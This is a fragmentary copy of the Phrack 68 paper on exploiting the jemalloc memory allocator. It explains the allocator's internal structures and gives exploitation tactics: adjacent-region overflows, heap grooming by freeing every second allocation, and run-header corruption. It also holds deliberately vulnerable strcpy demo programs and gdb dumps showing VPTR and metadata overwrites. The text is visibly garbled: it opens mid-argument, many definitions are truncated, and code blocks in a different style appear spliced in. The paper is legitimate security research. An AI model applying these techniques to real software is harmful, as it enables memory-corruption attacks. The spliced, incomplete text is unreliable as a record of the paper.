p68 0x0a Pseudomonarchia Jemallocum by Argp Huku
|=-----------------------------------------------------------------------=|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ argp | huku ]=------------------------=|
|=--------------------=[ {argp,huku}@grhack.net ]=---------------------=|
|=-----------------------------------------------------------------------=|
1 - Introduction
1.1 - Thousand-faced jemalloc
2 - jemalloc memory allocator overview
2.1 - Basic structures
2.1.1 - Chunks (arena_chunk_t)
2.1.2 - Arenas (arena_t)
2.1.3 - Runs (arena_run_t)
2.1.4 - Regions/Allocations
2.1.5 - Bins (arena_bin_t)
2.1.6 - Huge allocations
2.1.7 - Thread caches (tcache_t)
2.1.8 - Unmask jemalloc
2.2 - Algorithms
3 - Exploitation tactics
3.1 - Adjacent region corruption
3.2 - Heap manipulation
3.3 - Metadata corruption
3.3.1 - Run (arena_run_t)
3.3.2 - Chunk (arena_chunk_t)
3.3.3 - Thread caches (tcache_t)
4 - A real vulnerability
5 - Future work
6 - Conclusion
7 - References
8 - Code
--[ 1 - Introduction
All the above have led to a few versions of jemalloc that are very
similar but not exactly the same. To summarize, there are three different
widely used versions of jemalloc: 1) the standalone version [JESA],
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
FreeBSD libc [JEFB] version.
The exploitation vectors we investigate in this paper have been tested
on the jemalloc versions presented in subsection 1.1, all on the x86
platform. We assume basic knowledge of x86 and a general familiarity
with userland malloc() implementations; however, these are not strictly
required.
There are so many different jemalloc versions that we almost went crazy
double checking everything on all possible platforms. Specifically, we
tested the latest standalone jemalloc version (2.2.3 at the time of this
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
tested the Linux port of the FreeBSD malloc(3) implementation
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].
Before we start our analysis we would like to point out that jemalloc (as
well as other malloc implementations) does not implement concepts like
'unlinking' or 'frontlinking' which have proven to be catalytic for the
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
would like to stress the fact that the attacks we are going to present do
not directly achieve a write-4-anywhere primitive. We, instead, focus on
how to force malloc() (and possibly realloc()) to return a chunk that will
most likely point to an already initialized memory region, in hope that
the region in question may hold objects important for the functionality
of the target application (C++ VPTRs, function pointers, buffer sizes and
so on). Considering the various anti-exploitation countermeasures present
in modern operating systems (ASLR, DEP and so on), we believe that such
an outcome is far more useful for an attacker than a 4 byte overwrite.
Chunk #0 Chunk #1
.--------------------------------. .--------------------------------.
| | | |
| Run #0 Run #1 | | Run #0 Run #1 |
| .-------------..-------------. | | .-------------..-------------. |
| | || | | | | || | |
| | Page || Page | | | | Page || Page | |
| | .---------. || .---------. | | | | .---------. || .---------. | |
| | | | || | | | | | | | | || | | | | ...
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
| | | ^ ^ | || | | | | | | | ^ ^ | || | | | |
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
`-----|-----|--------------------' `-----|-----|--------------------'
| | | |
| | | |
.---|-----|----------. .---|-----|----------.
| | | | | | | |
| free regions' tree | ... | free regions' tree | ...
| | | |
`--------------------' `--------------------'
bin[Chunk #0][Run #0] bin[Chunk #1][Run #0]
If you are familiar with Linux heap exploitation (and more precisely with
dlmalloc internals) you have probably heard of the term 'chunk' before. In
dlmalloc, the term 'chunk' is used to denote the memory regions returned
by malloc(3) to the end user. We hope you get over it soon because when it
comes to jemalloc the term 'chunk' is used to describe big virtual memory
regions that the memory allocator conceptually divides available memory
into. The size of the chunk regions may vary depending on the jemalloc
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
highest abstraction used in jemalloc's design, that is the rest of the
structures described in the following paragraphs are actually placed within
a chunk somewhere in the target's memory.
The following are the chunk sizes in the jemalloc variants we have
examined:
+--------------------------+------------+
| jemalloc variant         | Chunk size |
+--------------------------+------------+
| FreeBSD 8.2-RELEASE      | 1 MB       |
| Standalone v2.2.3        | 4 MB       |
| jemalloc_linux_20080828a | 1 MB       |
| Mozilla Firefox v5.0     | 1 MB       |
| Mozilla Firefox v7.0.1   | 1 MB       |
| Mozilla Firefox v11.0    | 1 MB       |
+--------------------------+------------+
An area of jemalloc managed memory divided into chunks looks like the
following diagram. We assume a chunk size of 4 MB; remember that chunks are
aligned to their size. The address 0xb7000000 does not have a particular
significance apart from illustrating the offsets between each chunk.
+-------------------------------------------------------------------------+
| Chunk alignment | Chunk content |
+-------------------------------------------------------------------------+
| Chunk #1 starts at: 0xb7000000 [ Arena ]
| Chunk #2 starts at: 0xb7400000 [ Arena ]
| Chunk #3 starts at: 0xb7800000 [ Arena ]
| Chunk #4 starts at: 0xb7c00000 [ Arena ]
| Chunk #5 starts at: 0xb8000000 [ Huge allocation region, see below ]
| Chunk #6 starts at: 0xb8400000 [ Arena ]
| Chunk #7 starts at: 0xb8800000 [ Huge allocation region ]
| Chunk #8 starts at: 0xb8c00000 [ Huge allocation region ]
| Chunk #9 starts at: 0xb9000000 [ Arena ]
+-------------------------------------------------------------------------+
Huge allocation regions are memory regions managed by jemalloc chunks that
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc
also has the small/medium and large size classes for end user allocations
(both managed by arenas). We analyze jemalloc's size classes of regions in
subsection 2.1.4.
[2-1]
/*
* Whether this chunk contained at some point one or more dirty pages.
*/
bool dirtied;
/*
* A chunk map element corresponds to a page of this chunk. The map
* keeps track of free and large/small regions.
*/
arena_chunk_map_t map[];
};
The main use of chunk maps in combination with the memory alignment of the
chunks is to enable constant time access to the management metadata of free
and large/small heap allocations (regions).
Arenas are the central jemalloc data structures as they are used to manage
the chunks (and the underlying pages) that are responsible for the small
and large allocation size classes. Specifically, the arena structure is
defined as follows:
[2-2]
/*
* Each arena has a spare chunk in order to cache the most recently
* freed chunk.
*/
arena_chunk_t *spare;
/*
* Ordered tree of this arena's available clean runs, i.e. runs
* associated with clean pages.
*/
arena_avail_tree_t runs_avail_clean;
/*
* Ordered tree of this arena's available dirty runs, i.e. runs
* associated with dirty pages.
*/
arena_avail_tree_t runs_avail_dirty;
/*
* Bins are used to store structures of free regions managed by this
* arena.
*/
arena_bin_t bins[];
};
arena_t **arenas;
unsigned narenas;
The main responsibility of a run is to keep track of the state (i.e. free
or used) of end user memory allocations, or regions as these are called in
jemalloc terminology. Each run holds regions of a specific size (however
within the small and large size classes as we have mentioned) and their
state is tracked with a bitmask. This bitmask is part of a run's metadata;
these metadata are defined with the following structure:
[2-3]
/*
* The index of the next region of the run that is free. On the FreeBSD
* and Firefox flavors of jemalloc this variable is named regs_minelm.
*/
uint32_t nextind;
/*
* Bitmask for the regions in this run. Each bit corresponds to one
* region. A 0 bit means that the region is used, while a 1 bit means
* that the corresponding region is free. The variable nextind (or regs_minelm
* on FreeBSD and Firefox) is the index of the first non-zero element
* of this array.
*/
unsigned regs_mask[];
};
In jemalloc the term 'regions' applies to the end user memory areas
returned by malloc(3). As we have briefly mentioned earlier, regions are
divided into three classes according to their size, namely a) small/medium,
b) large and c) huge.
Huge regions are considered those that are bigger than the chunk size minus
the size of some jemalloc headers. For example, in the case that the chunk
size is 4 MB (4096 KB) then a huge region is an allocation greater than
4078 KB. Small/medium are the regions that are smaller than a page. Large
are the regions that are smaller than the huge regions (chunk size minus
some headers) and also larger than the small/medium regions (page size).
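The boundaries described above can be sketched with the following
classifier. The ~18 KB of header overhead is an assumption derived from
the 4078 KB figure above; this is an illustration of the size class
boundaries, not jemalloc's actual code:

```c
#include <stddef.h>

/* Illustrative values for a 4 MB chunk setup. HDR_OVERHEAD is a
 * hypothetical header size chosen so that CHUNK_SZ - HDR_OVERHEAD
 * equals the 4078 KB huge threshold mentioned in the text. */
#define PAGE_SZ      4096u
#define CHUNK_SZ     (4u * 1024 * 1024)
#define HDR_OVERHEAD (18u * 1024)

enum size_class { SMALL, LARGE, HUGE_ };

/* Classify a request size into jemalloc's three size classes:
 * small/medium below a page, large up to the chunk size minus
 * headers, huge beyond that. */
static enum size_class classify(size_t size)
{
    if (size < PAGE_SZ)
        return SMALL;
    if (size <= CHUNK_SZ - HDR_OVERHEAD)
        return LARGE;
    return HUGE_;
}
```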
Huge regions have their own metadata and are managed separately from
small/medium and large regions. Specifically, they are managed by a
red-black tree that is global to the allocator, and they have their own
dedicated and contiguous chunks. Large regions have their own runs, that is each
large allocation has a dedicated run. Their metadata are situated on
the corresponding arena chunk header. Small/medium regions are placed
on different runs according to their specific size. As we have seen in
2.1.3, each run has its own header in which there is a bitmask array
specifying the free and the used regions in the run.
In the standalone flavor of jemalloc the smallest run is that for regions
of size 4 bytes. The next run is for regions of size 8 bytes, the next
for 16 bytes, and so on.
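This doubling progression can be sketched as follows. The function is an
illustration of the smallest size classes only (assuming the standalone
flavor's 4-byte minimum mentioned above); it is not jemalloc's actual
size-class code:

```c
#include <stddef.h>

/* Round a tiny request up to its region size class by doubling from
 * the 4-byte minimum: 4, 8, 16, ... (illustrative sketch only). */
static size_t tiny_class(size_t size)
{
    size_t cls = 4;  /* smallest region size in the standalone flavor */

    while (cls < size)
        cls <<= 1;
    return cls;
}
```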
Bins are used by jemalloc to store free regions. Bins organize the free
regions via runs and also keep metadata about their regions, like for
example the size class, the total number of regions, etc. A specific bin
may be associated with several runs, however a specific run can only be
associated with a specific bin, i.e. there is a one-to-many correspondence
between bins and runs. Bins have their associated runs organized in a tree.
Each bin has an associated size class and stores/manages regions of this
size class. A bin's regions are managed and accessed through the bin's
runs. Each bin has a member element representing the most recently used run
of the bin, called 'current run' with the variable name runcur. A bin also
has a tree of runs with available/free regions. This tree is used when the
current run of the bin is full, that is it doesn't have any free regions.
[2-4]
/*
* The current run of the bin that manages regions of this bin's size
* class.
*/
arena_run_t *runcur;
/*
* The tree of the bin's associated runs (all responsible for regions
* of this bin's size class of course).
*/
arena_run_tree_t runs;
/*
* The total size of a run of this bin. Remember that each run may
* consist of more than one page.
*/
size_t run_size;
/*
* The total number of elements in the regs_mask array of a run of this
* bin. See 2.1.3 for more information on regs_mask.
*/
uint32_t regs_mask_nelms;
/*
* The offset of the first region in a run of this bin. This can be
* non-zero due to alignment requirements.
*/
uint32_t reg0_offset;
};
one = malloc(2);
two = malloc(8);
three = malloc(16);
Using gdb let's explore jemalloc's structures. First let's see the runs
that the above allocations created in their corresponding bins:
We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
is responsible for the size class 2 and its current run is at 0xb7d01000,
'bin[1]' is responsible for the size class 4 and doesn't have a current
run since no allocations of size 4 were made, 'bin[2]' is responsible
for the size class 8 with its current run at 0xb7d02000, and so on. In the
code archive you can find a Python script for gdb named unmask_jemalloc.py
for easily enumerating the size of bins and other internal information in
the various jemalloc flavors (see 2.1.8 for a sample run).
.----------------------------------. .---------------------------.
.----------------------------------. | +--+-----> arena_chunk_t |
.---------------------------------. | | | | |
| arena_t | | | | | .---------------------. |
| | | | | | | | |
| .--------------------. | | | | | | arena_run_t | |
| | arena_chunk_t list |-----+ | | | | | | | |
| `--------------------' | | | | | | | .-----------. | |
| | | | | | | | | page | | |
| arena_bin_t bins[]; | | | | | | | +-----------+ | |
| .------------------------. | | | | | | | | region | | |
| | bins[0] ... bins[27] | | | | | | | | +-----------+ | |
| `------------------------' | | |.' | | | | region | | |
| | | |.' | | | +-----------+ | |
`-----+----------------------+----' | | | | region | | |
| | | | | +-----------+ | |
| | | | | . . . | |
| v | | | .-----------. | |
| .-------------------. | | | | page | | |
| | .---------------. | | | | +-----------+ | |
| | | arena_chunk_t |-+---+ | | | region | | |
| | `---------------' | | | +-----------+ | |
| [2-5] | .---------------. | | | | region | | |
| | | arena_chunk_t | | | | +-----------+ | |
| | `---------------' | | | | region | | |
| | . . . | | | +-----------+ | |
| | .---------------. | | | | |
| | | arena_chunk_t | | | `---------------------' |
| | `---------------' | | [2-6] |
| | . . . | | .---------------------. |
| `-------------------' | | | |
| +----+--+---> arena_run_t | |
| | | | | |
+----------+ | | | .-----------. | |
| | | | | page | | |
| | | | +-----------+ | |
| | | | | region | | |
v | | | +-----------+ | |
.--------------------------. | | | | region | | |
| arena_bin_t | | | | +-----------+ | |
| bins[0] (size 8) | | | | | region | | |
| | | | | +-----------+ | |
| .----------------------. | | | | . . . | |
| | arena_run_t *runcur; |-+---------+ | | .-----------. | |
| `----------------------' | | | | page | | |
`--------------------------' | | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | |
| `---------------------' |
`---------------------------'
Huge allocations are not very interesting for the attacker but they are an
integral part of jemalloc which may affect the exploitation process. Simply
put, huge allocations are represented by 'extent_node_t' structures that
are ordered in a global red-black tree which is common to all threads.
[2-7]
/* Tree of extents. */
typedef struct extent_node_s extent_node_t;
struct extent_node_s {
#ifdef MALLOC_DSS
/* Linkage for the size/address-ordered tree. */
rb_node(extent_node_t) link_szad;
#endif
malloc_mutex_lock(&huge_mtx);
extent_tree_ad_insert(&huge, node);
The most interesting thing about huge allocations is the fact that free
base nodes are kept in a LIFO list whose head is the pointer named
'base_nodes'. Although declared as a simple pointer, 'base_nodes' is
handled as the head of a list that is threaded through the free nodes
themselves: the first word of each free node holds the pointer to the
next available one.
static extent_node_t *
base_node_alloc(void)
{
extent_node_t *ret;
malloc_mutex_lock(&base_mtx);
if (base_nodes != NULL) {
ret = base_nodes;
base_nodes = *(extent_node_t **)ret;
...
}
...
}
static void
base_node_dealloc(extent_node_t *node)
{
malloc_mutex_lock(&base_mtx);
*(extent_node_t **)node = base_nodes;
base_nodes = node;
...
}
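The recycling scheme implemented by 'base_node_alloc()' and
'base_node_dealloc()' above can be demonstrated with the following
self-contained toy (we stub out 'extent_node_t' and drop the locking;
only the first word of a free node matters here):

```c
#include <stddef.h>

/* Stub: in the real allocator this is the full extent node; for the
 * free list only the first word is reused as a 'next' pointer. */
typedef struct extent_node_s {
    void *first_word;
    char pad[28];
} extent_node_t;

static extent_node_t *base_nodes = NULL;

/* Push a node on the free list: its first word is overwritten with
 * the old list head, then the node becomes the new head. */
static void node_dealloc(extent_node_t *node)
{
    *(extent_node_t **)node = base_nodes;
    base_nodes = node;
}

/* Pop the most recently freed node (LIFO), following the pointer
 * stored in its first word to find the next head. */
static extent_node_t *node_alloc(void)
{
    extent_node_t *ret = base_nodes;

    if (ret != NULL)
        base_nodes = *(extent_node_t **)ret;
    return ret;
}
```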
1) A multicore system is the reason jemalloc allocates more than one arena.
On a unicore system there's only one available arena, even on multithreaded
applications. However, the Firefox jemalloc variant has just one arena
hardcoded, therefore it has no thread caches.
void *
arena_malloc(arena_t *arena, size_t size, bool zero)
{
...
In this section we will analyze thread magazines, but the exact same
principles apply on the tcaches (the change in the nomenclature is probably
the most notable difference between them).
The following figure depicts the relationship between the various thread
magazines' structures.
.-------------------------------------------.
| mag_rack_t |
| |
| bin_mags_t bin_mags[]; |
| |
| .-------------------------------------. |
| | bin_mags[0] ... bin_mags[nbins - 1] | |
| `-------------------------------------' |
`--------|----------------------------------'
|
| .------------------.
| +----------->| mag_t |
v | | |
.----------------------. | | void *rounds[] |
| bin_mags_t | | | ... |
| | | `------------------'
| .----------------. | |
| | mag_t *curmag; |-----------+
| `----------------' |
| ... |
`----------------------'
/*
* Magazines are lazily allocated, but once created, they remain until the
* associated mag_rack is destroyed.
*/
typedef struct bin_mags_s bin_mags_t;
struct bin_mags_s {
mag_t *curmag;
mag_t *sparemag;
};
void
mag_load(mag_t *mag)
{
arena_t *arena;
arena_bin_t *bin;
arena_run_t *run;
void *round;
size_t i;
if (round == NULL)
break;
...
mag->nrounds = i;
}
/* Just return the next available void pointer. It points to one of the
* preallocated memory regions.
*/
void *
mag_alloc(mag_t *mag)
{
if (mag->nrounds == 0)
return (NULL);
mag->nrounds--;
return (mag->rounds[mag->nrounds]);
}
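To illustrate, the following self-contained sketch reduces 'mag_t' to the
two fields that 'mag_alloc()' touches and shows the LIFO pop from the
rounds array; the 8-slot array size and the '_sketch' name are our own
illustrative choices:

```c
#include <stddef.h>

/* Reduced mag_t: a count of available rounds and the array of
 * preallocated region pointers. */
typedef struct {
    size_t nrounds;
    void *rounds[8];
} mag_t;

/* Pop the last loaded round (LIFO); NULL when the magazine is empty,
 * mirroring mag_alloc() above. */
static void *mag_alloc_sketch(mag_t *mag)
{
    if (mag->nrounds == 0)
        return NULL;
    mag->nrounds--;
    return mag->rounds[mag->nrounds];
}
```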
The most notable thing about magazines is the fact that 'rounds', the array
of void pointers, as well as all the related thread metadata (magazine
racks, magazine bins and so on) are allocated by normal calls to functions
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
metadata lying among normal end user memory regions.
As we are sure you are all aware, since version 7.0, gdb can be scripted
with Python. In order to unmask and bring to light the internals of the
various jemalloc flavors, we have developed a Python script for gdb
appropriately named unmask_jemalloc.py. The following is a sample run of
the script on Firefox 11.0 on Mac OS X (edited for readability):
$ open firefox-11.0.app
...
Attaching to process 837
[New Thread 0x2003 of process 837]
[New Thread 0x2103 of process 837]
[New Thread 0x2203 of process 837]
[New Thread 0x2303 of process 837]
[New Thread 0x2403 of process 837]
[New Thread 0x2503 of process 837]
[New Thread 0x2603 of process 837]
[New Thread 0x2703 of process 837]
[New Thread 0x2803 of process 837]
[New Thread 0x2903 of process 837]
[New Thread 0x2a03 of process 837]
[New Thread 0x2b03 of process 837]
[New Thread 0x2c03 of process 837]
[New Thread 0x2d03 of process 837]
[New Thread 0x2e03 of process 837]
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
Contents/Resources/DWARF/firefox...done.
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
(gdb) source unmask_jemalloc.py
(gdb) unmask_jemalloc
MALLOC(size):
IF size CAN BE SERVICED BY AN ARENA:
IF size IS SMALL OR MEDIUM:
bin = get_bin_for_size(size)
bit = get_first_set_bit(run->regs_mask)
region = get_region(run, bit)
CALLOC(n, size):
RETURN MALLOC(n * size)
FREE(addr):
IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS TO:
IF addr IS A SMALL ALLOCATION:
run = get_run_addr_belongs_to(addr);
bin = run->bin;
size = bin->reg_size;
element = get_element_index(addr, run, bin)
unset_bit(run->regs_mask[element])
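The get_element_index() step of the pseudocode above boils down to simple
arithmetic on the region's offset inside its run. A sketch, assuming
32-bit 'regs_mask' words and the 1-bit-means-free convention from [2-3]
(the function names are ours, not jemalloc's):

```c
#include <stdint.h>

/* The region's index inside its run: offset past reg0_offset divided
 * by the bin's region size. */
static unsigned region_index(uintptr_t addr, uintptr_t run,
                             uint32_t reg0_offset, uint32_t reg_size)
{
    return (unsigned)((addr - run - reg0_offset) / reg_size);
}

/* Mark the region free in the run's bitmask: element index / 32,
 * bit index % 32, and a 1 bit means free (per [2-3]). */
static void mark_region_free(uint32_t *regs_mask, unsigned index)
{
    regs_mask[index / 32] |= 1u << (index % 32);
}
```

For instance, with a run at 0xb7003000, reg0_offset 0x30 and a 16-byte
size class, the region at 0xb7003050 has index 2, i.e. bit 2 of
regs_mask[0].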
The main idea behind adjacent heap item corruptions is that you exploit the
fact that the heap manager places user allocations next to each other
contiguously without other data in between. In jemalloc regions of the same
size class are placed on the same bin. In the case that they are also
placed on the same run of the bin then there are no inline metadata between
them. In 3.2 we will see how we can force this, but for now let's assume
that new allocations of the same size class are placed in the same run.
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x10);
memset(three, 0x43, 0x10);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
[3-1]
[3-2]
free(one);
free(two);
free(three);
[3-3]
Examining the above we can see that region 'one' is at 0xb7003030 and that
the following two allocations (regions 'two' and 'three') are in the same
run immediately after 'one' and all three next to each other without any
metadata in between them. After the overflow of 'two' with 30 'X's we can
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
size of region 'two').
At breakpoint [3-1]:
At 0xb7003000 is the current run of the bin bins[2] that manages the size
class 16 in the standalone jemalloc flavor that we have linked against.
Let's take a look at the run's contents:
After some initial metadata (the run's header which we will see in more
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
'two' and 'three', all of size 16 bytes. Again we can see that there are no
metadata between the regions. Continuing to breakpoint [3-2] and examining
again the contents of the run:
We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
should be clear why the printf(3) call of region 'one' after the overflow
continues to print all 46 bytes (16 from region 'one' plus 30 from the
overflow) up to the NULL placed by the strcpy(3) call. As it has been
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
overflows [PV10], this can lead to information leaks from the region that
is adjacent to the region with the string whose terminating NULL has been
overwritten. You just need to read back the string and you will get all
data up to the first encountered NULL.
We can see that jemalloc does not clear the freed regions. This behavior of
leaving stale data in regions that have been freed and can be allocated
again can lead to easier exploitation of use-after-free bugs (see next
section).
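The consequence can be illustrated with a toy single-region allocator
(not jemalloc itself): because deallocation does not clear the region, a
subsequent same-size allocation hands back the stale contents intact.

```c
#include <string.h>

/* Toy allocator with a single 16-byte region; stands in for a
 * jemalloc run region of the same size class. */
static char pool[16];
static int pool_free = 1;

static void *toy_alloc(void)
{
    if (!pool_free)
        return NULL;
    pool_free = 0;
    return pool;
}

/* Note: like jemalloc's free(), the contents are NOT cleared. */
static void toy_free(void *p)
{
    (void)p;
    pool_free = 1;
}
```

A use-after-free bug on the freed region therefore still sees (or can be
made to see, via a controlled reallocation) meaningful attacker data.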
class base
{
private:
char buf[32];
public:
void
copy(const char *str)
{
strcpy(buf, str);
}
virtual void
print(void)
{
printf("buf: 0x%08x: %s\n", buf, buf);
}
};
void
print(void)
{
printf("[+] derived_a: ");
base::print();
}
};
void
print(void)
{
printf("[+] derived_b: ");
base::print();
}
};
int
main(int argc, char *argv[])
{
base *obj_a;
base *obj_b;
if(argc == 3)
{
printf("[+] overflowing from obj_a into obj_b\n");
obj_a->copy(argv[1]);
obj_b->copy(argv[2]);
obj_a->print();
obj_b->print();
return 0;
}
$ gdb vuln-vptr
...
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
...
0x804862f <main(int, char**)+15>: movl $0x24,(%esp)
0x8048636 <main(int, char**)+22>: call 0x80485fc <_Znwj@plt>
0x804863b <main(int, char**)+27>: movl $0x80489e0,(%eax)
gdb $ print $eax
$13 = 0xb7c01040
At 0x8048636 we can see the first 'new' call which takes as a parameter the
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
use jemalloc to allocate the required amount of memory for this new object.
After the call instruction, EAX has the address of the allocated region
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
the VPTR that points to 'print(void)' of 'obj_a':
Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
with its own VPTR (0x080489f0).
Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
before the first call of 'print()'. Our run now looks like the following:
The next step is to deallocate every second region in this last series
of controlled victim allocations. This will create holes in between the
victim objects/structures on the run of the size class we are trying to
manipulate. Finally, we trigger the heap overflow bug forcing, due to the
state we have arranged, jemalloc to place the vulnerable objects in holes
on the target run overflowing into the victim objects.
char *foo[NALLOC];
char *bar[NALLOC];
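The steps above can be sketched as follows, assuming that plain malloc()
and free() act as our allocation/deallocation primitives for the 16-byte
size class (the NALLOC value is illustrative):

```c
#include <stdlib.h>

#define NALLOC 512

/* Fill the target run(s) with victim-sized objects, then free every
 * second one: the run is left with holes that the next same-size
 * (vulnerable) allocations will fall into, landing them adjacent to
 * the surviving victim objects. */
static void make_holes(char *foo[NALLOC])
{
    int i;

    /* step 1: controlled allocations of victim objects */
    for (i = 0; i < NALLOC; i++)
        foo[i] = malloc(16);

    /* step 2: punch holes by freeing every second region */
    for (i = 0; i < NALLOC; i += 2) {
        free(foo[i]);
        foo[i] = NULL;
    }
}
```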
jemalloc's behavior can be observed in the output, remember that our target
size class is 16 bytes:
$ ./test-holes
step 1: controlled allocations of victim objects
foo[0]: 0x40201030
foo[1]: 0x40201040
foo[2]: 0x40201050
foo[3]: 0x40201060
foo[4]: 0x40201070
foo[5]: 0x40201080
foo[6]: 0x40201090
foo[7]: 0x402010a0
...
foo[447]: 0x40202c50
foo[448]: 0x40202c60
foo[449]: 0x40202c70
foo[450]: 0x40202c80
foo[451]: 0x40202c90
foo[452]: 0x40202ca0
foo[453]: 0x40202cb0
foo[454]: 0x40202cc0
foo[455]: 0x40202cd0
foo[456]: 0x40202ce0
foo[457]: 0x40202cf0
foo[458]: 0x40202d00
foo[459]: 0x40202d10
foo[460]: 0x40202d20
...
We can see that jemalloc works in a FIFO way; the first region freed is the
first returned for a subsequent allocation request. Although our example
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
region corruptions, our observations can also help us to exploit
use-after-free vulnerabilities. When our goal is to get data of our own
choosing in the same region as a freed region about to be used, jemalloc's
FIFO behavior can help us place our data in a predictable way.
In the above discussion we have implicitly assumed that we can make
arbitrary allocations and deallocations; i.e. that we have available in
our exploitation tool belt allocation and deallocation primitives for
our target size. Depending on the vulnerable application (that relies
on jemalloc) this may or may not be straightforward. For example, if
our target is a media player we may be able to control allocations by
introducing an arbitrary number of metadata tags in the input file. In
the case of Firefox we can of course use Javascript to implement our
heap primitives. But that's the topic of another paper.
For release builds the 'magic' field will not be present (that is,
MALLOC_DEBUG is off by default). As we have already mentioned, each
run contains a pointer to the bin whose regions it contains. The 'bin'
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
during deallocation. On deallocation the region size is unknown, thus the
bin index cannot be computed directly, instead, jemalloc will first find
the run the memory to be freed is located and will then dereference the
bin pointer stored in the run's header. From function 'arena_dalloc_small':
On the other hand, during the allocation process, once the appropriate run
is located, its 'regs_mask[]' bit vector is examined in search of a free
region. Note that the search for a free region starts at
'regs_mask[regs_minelm]' ('regs_minelm' holds the index of the first
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
force 'malloc()' to return an already allocated region.
Let's first have a look at what the in-memory model of a run looks like
(file test-run.c):
char *first;
breakpoint();
free(first);
The call to malloc() returns the address 0x28201030 which belongs to the
run at 0x28201000.
Oki doki, run 0x28201000 services the requests for memory regions of size
16 as indicated by the 'reg_size' value of the bin pointer stored in the
run header (notice that run->bin->runcur == run).
Now let's proceed with studying a scenario that can lead to 'malloc()'
exploitation. For our example let's assume that the attacker controls
a memory region 'A' which is the last in its run.
In the simple diagram shown above, 'R' stands for a normal region which may
or may not be allocated while 'A' corresponds to the region that belongs to
the attacker, i.e. it is the one that will be overflown. 'A' does not
strictly need to be the last region of run #1. It can also be any region of
the run. Let's explore how from a region on run #1 we can reach the
metadata of run #2 (file test-runhdr.c, also see [2-6]):
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x20);
memset(three, 0x43, 0x20);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
__asm__("int3");
__asm__("int3");
At the first breakpoint we can see that for size 16 the run is at
0xb7d01000 and for size 32 the run is at 0xb7d02000:
gdb $ r
[Thread debugging using libthread_db enabled]
[+] region one: 0xb7d01030: AAAAAAAAAAAAAAAA
[+] region two: 0xb7d01040: BBBBBBBBBBBBBBBB
[+] region three: 0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
We can see that the run's metadata and specifically the address of the
'bin' element (see [2-3]) has been overwritten. One way or the other, the
attacker will be able to alter the contents of run #2's header, but once
this has happened, what's the potential of achieving code execution?
A careful reader would have already thought the obvious; one can overwrite
the 'bin' pointer to make it point to a fake bin structure of his own.
Well, this is not a good idea for two reasons. First, the attacker
needs further control of the target process in order to successfully
construct a fake bin header somewhere in memory. Secondly, and most
importantly, as it has already been discussed, the 'bin' pointer of a
region's run header is dereferenced only during deallocation. A careful
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
attacker's point of view, the bin pointer is not that interesting
('reg0_offset' overwrite may cause further problems as well leading to
crashes and a forced interrupt of our exploit).
if(argc < 2)
{
printf("%s <offset>\n", argv[0]);
return 0;
}
...
i = run->regs_minelm;
mask = run->regs_mask[i]; /* [3-4] */
if (mask != 0) {
/* Usable allocation found. */
bit = ffs((int)mask) - 1; /* [3-5] */
...
}
~$ gdb ./vuln-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run -2
Starting program: vuln-run -2
Allocating a chunk of 16 bytes just for fun
one = 0x28202030
Allocating first chunk of 32 bytes
two = 0x28203020
Performing more 32 byte allocations
...
